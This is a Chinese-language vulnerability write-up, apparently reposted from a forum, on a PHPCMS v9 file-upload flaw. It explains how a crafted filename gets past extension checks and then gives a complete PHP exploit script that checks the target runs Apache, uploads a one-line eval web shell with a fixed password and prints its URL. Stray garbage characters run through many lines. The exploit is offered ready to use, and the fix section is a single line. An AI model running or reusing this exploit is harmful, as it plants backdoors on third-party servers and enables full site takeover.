PHPCMS v9 Getshell

admin

漏洞类型： 文件上传导致任意代码执行
' M1 G! j( E' O
简要描述：

0 g9 P$ U( K, x; _. o/ o: tphpcms v9 getshell (apache)
详细说明：

; r( z$ L! b+ T- I3 Y漏洞文件：phpcms\modules\attachment\attachments.php

  o; q' o& P3 X0 \public function crop_upload() {  (isset($GLOBALS["HTTP_RAW_POST_DATA"])) {  $pic = $GLOBALS["HTTP_RAW_POST_DATA"];  if (isset($_GET['width']) && !empty($_GET['width'])) {  $width = intval($_GET['width']);  }  if (isset($_GET['height']) && !empty($_GET['height'])) {  $height = intval($_GET['height']);  }  if (isset($_GET['file']) && !empty($_GET['file'])) {  $_GET['file'] = str_replace(';','',$_GET['file']);//过滤了分号  if(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit();//is_image()检测是个关键  if (strpos($_GET['file'], pc_base::load_config('system', 'upload_url'))!==false) {  $file = $_GET['file'];  $basenamebasename = basename($file);//获取带有后缀的文件名  if (strpos($basename, 'thumb_')!==false) {  $file_arr = explode('_', $basename);  $basename = array_pop($file_arr);  }  $new_file = 'thumb_'.$width.'_'.$height.'_'.$basename;  } else {  pc_base::load_sys_class('attachment','',0);  $module = trim($_GET['module']);  $catid = intval($_GET['catid']);  $siteid = $this->get_siteid();  $attachment = new attachment($module, $catid, $siteid);  $uploadedfile['filename'] = basename($_GET['file']);  $uploadedfile['fileext'] = fileext($_GET['file']);  if (in_array($uploadedfile['fileext'], array('jpg', 'gif', 'jpeg', 'png', 'bmp'))) {  $uploadedfile['isimage'] = 1;  }  $file_path = $this->upload_path.date('Y/md/');  pc_base::load_sys_func('dir');  dir_create($file_path);  $new_file = date('Ymdhis').rand(100, 999).'.'.$uploadedfile['fileext'];  $uploadedfile['filepath'] = date('Y/md/').$new_file;  $aid = $attachment->add($uploadedfile);  }  $filepath = date('Y/md/');  file_put_contents($this->upload_path.$filepath.$new_file, $pic);//文件名可控、$pic可控  } else {  return false;  }  echo pc_base::load_config('system', 'upload_url').$filepath.$new_file;  exit;  }  }
, }# M* g! H+ x  V后缀检测：phpcms\modules\attachment\functions\global.func.php

/ c8 [, ~" j0 r1 {% \- ~

function is_image($file) { 　　 $ext_arr = array('jpg','gif','png','bmp','jpeg','tiff'); 　　 $ext = fileext($file);关键地方 　　 return in_array($ext,$ext_arr) ? $ext_arr :false; 　　}  

% c* R% |6 I  E9 L关键函数:
  V- @9 {9 R* E

+ J. W/ L* Y( J/ a
8 ~$ T' ~4 t% w- m; yfunction fileext($filename) {  return strtolower(trim(substr(strrchr($filename, '.'), 1, 10))); }  

　　Fileext函数是对文件后缀名的提取。
! s- _9 Z: S# d根据此函数我们如果上传文件名为ddd.Php.jpg%20%20%20%20%20%20%20Php
# |1 F% L7 g1 c& i. O( X5 z- X经过此函数提取到的后缀还是jpg，因此正在is_image()函数中后缀检测被绕过了。
我们回到public function crop_upload() 函数中
if(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit();
; c+ Q/ J) P0 ^7 p- c在经过了is_image的判断之后又来了个.php的判断，在此程序员使用的是strpos函数
2 j6 ]2 P' |7 b( e5 g2 [2 m这个函数是对大小写敏感的函数我们使用.Php就可以直接绕过了。
经过上边的两层的过滤我们的ddd.Php.jpg%20%20%20%20%20%20%20Php后缀依然有效。
0 g: S* \- Y+ C9 n" i% ~0 T, o最后$basename变量的值就为ddd.Php.jpg%20%20%20%20%20%20%20Php 然后使用file_put_contents函数写入到了指定目录。
看见ddd.Php.jpg%20%20%20%20%20%20%20Php这个后缀，大家应该明白了，它用在apache搭建的服务器上可以被解析。
5 H/ q$ o4 {! U  Y; [9 l+ \漏洞证明：
0 u# v6 N% J* m& K1 O' v6 A3 V% a: I
) E! ^3 g) b# C. e. ]exp:
' N3 k0 R! |+ l# O3 H3 a6 v
0 f* H/ m! \# l<?php
error_reporting(E_ERROR);
set_time_limit(0);
  d8 k* L1 h, x! f2 V' J$pass="ln";
print_r('
+---------------------------------------------------------------------------+
* e/ x* @* R) D& f' w" FPHPCms V9 GETSHELL 0DAY
; [' q7 |' X' G8 M8 ucode by L.N.

apache 适用(利用的apache的解析漏洞) // 云安全 www.yunsec.net
# ?: A4 s& [! M+ ]; {8 I& {( P; J+---------------------------------------------------------------------------+
+ ~4 t5 I' b" J* ^" z: |, ?');
* n+ M+ F" X) z" S& A0 [if ($argc < 2) {
print_r('
: b/ v' J$ r- X# k4 E+---------------------------------------------------------------------------+
& }) g! Q" C- x  x8 XUsage: php '.$argv[0].' url path
, w% S% ~: ]; {6 ?. c2 g+ z
, O- ?, m" x. z% t* Y& a% }Example:
% H3 c9 M" y( i% F1 a1.php '.$argv[0].' lanu.sinaapp.com
2.php '.$argv[0].' lanu.sinaapp.com /phpcms
+---------------------------------------------------------------------------+
& \0 |2 E1 b, s4 d');
5 f5 }5 r1 J7 n# [6 D! hexit;
}
7 @  L1 m: c* u+ t- N: P/ ^8 ?
8 N# W# i# i( X$url = $argv[1];
& i& V* ?+ u( U. C4 N/ i  m: V* L$path = $argv[2];
$phpshell = '<?php @eval($_POST[\''.$pass.'\']);?>';
% {, w" q* {8 K% P$file = '1.thumb_.Php.JPG%20%20%20%20%20%20%20Php';
8 i/ A. B0 v- M3 w' R5 ]8 Lif($ret=Create_dir($url,$path))
' u4 u! T8 T& `- Q" b2 W/ H+ P& w{
/ i& J7 L3 L1 ~! \  n8 j//echo $ret;
% {% x' Y+ n4 D( p$pattern = "|Server:[^,]+?|U";
preg_match_all($pattern, $ret, $matches);
2 }# l% ]! b7 J8 y8 E0 dif($matches[0][0])
{
% k5 D( i5 R7 ^9 ]0 }1 |if(strpos($matches[0][0],'Apache') == false)
{
echo "\n亲！此网站不是apache的网站。\n";exit;
}
}
$ret = GetShell($url,$phpshell,$path,$file);
+ F& v3 H$ b3 p5 F( l' S* X$pattern = "|http:\/\/[^,]+?\.,?|U";
preg_match_all($pattern, $ret, $matches);
0 l- h- l( J. d9 S* ~8 }) Yif($matches[0][0])
6 A8 o7 [; U% |# g3 n. S: b0 g( X{
echo "\n".'密码为: '.$pass."\n";
% h/ Y$ O6 V9 y0 p$ \4 D: Techo "\r\nurl地址: ".$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;
}
1 D- }% }, u, y/ Y6 s& u- e# z9 felse
: H# `- n4 @* x7 ^5 [{
$pattern = "|\/uploadfile\/[^,]+?\.,?|U";
preg_match_all($pattern, $ret, $matches);
if($matches[0][0])
. L; f/ @# P9 l  E8 {1 w{
echo "\n".'密码为: '.$pass."\n";
echo "\r\nurl地址:".'http://'.$url.$path.$matches[0][0].'JPG%20%20%20%20%20%20%20Php'."\n";exit;
% a& I/ b; Y. H3 K" y, T# T5 b}
else
" X; R; B# Y, B+ T! C9 m{
1 w( U! s: u4 _$ Oecho "\r\n没得到！\n";exit;
0 j: }: i: y7 n4 F* q, B}
}
}

. ~* V* T  X& E" Yfunction GetShell($url,$shell,$path,$js)
{
$content =$shell;
$data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://".$url.$path."/uploadfile/".$js." HTTP/1.1\r\n";
$data .= "Host: ".$url."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
+ p' X) @* u) i2 K$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
$data .= "Connection: close\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
& ~9 }0 }: G( T$ Z$data .= $content."\r\n";
$ock=fsockopen($url,80);
if (!$ock)
{
; \' r) e& z* {' F, b: Iecho "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;
}
else
0 X( v) O. `% P7 b+ C/ Y) `4 I{
fwrite($ock,$data);
, ?& _8 k7 ^! Q7 Z1 A) t& y$resp = '';
while (!feof($ock))
{
8 G, a, h& ]2 m5 X" m$resp.=fread($ock, 1024);
}
return $resp;
}
}

9 r1 ^" ?! [. |# I1 `function Create_dir($url,$path='')
{
$content ='I love you';
( e2 n7 f# r* L' }; w$ F1 A$data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://lanu.sinaapp.com/1.jpg HTTP/1.1\r\n";
$data .= "Host: ".$url."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
" y! F- f2 i' e; w* D$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
4 ]1 b& j) [; ^, M; G$ F! r( a0 r9 k$data .= "Connection: close\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
1 Q" o( H- ]: v3 Z- H# o( ?9 U1 m$data .= $content."\r\n";
$ock=fsockopen($url,80);
if (!$ock)
& {, y2 {; ]4 H  T; Q- U5 e{
$ u* a; ?9 l; n6 d% y. q) G$ C4 fecho "\n"."此网站没有回应,检测url是否输入正确"."\n";exit;
% f$ j- A- }( O}
fwrite($ock,$data);
$resp = '';
  X4 S' [: m* m/ c  z9 x4 Q) ~; Nwhile (!feof($ock))
0 E/ e$ C- F* M' x{
$resp.=fread($ock, 1024);
9 |) i/ x- s3 E/ u7 f}
" D6 I0 o, _6 f+ l- j% W! M# q1 Ureturn $resp;
+ l: \+ `) f6 k$ y}
* H% e# N$ p  c6 M2 X  c4 r?>

修复方案：
& _9 O" o3 T, X' p/ G5 n5 {
9 z5 P; r/ B+ D% i* V5 o4 Z5 I过滤过滤再过滤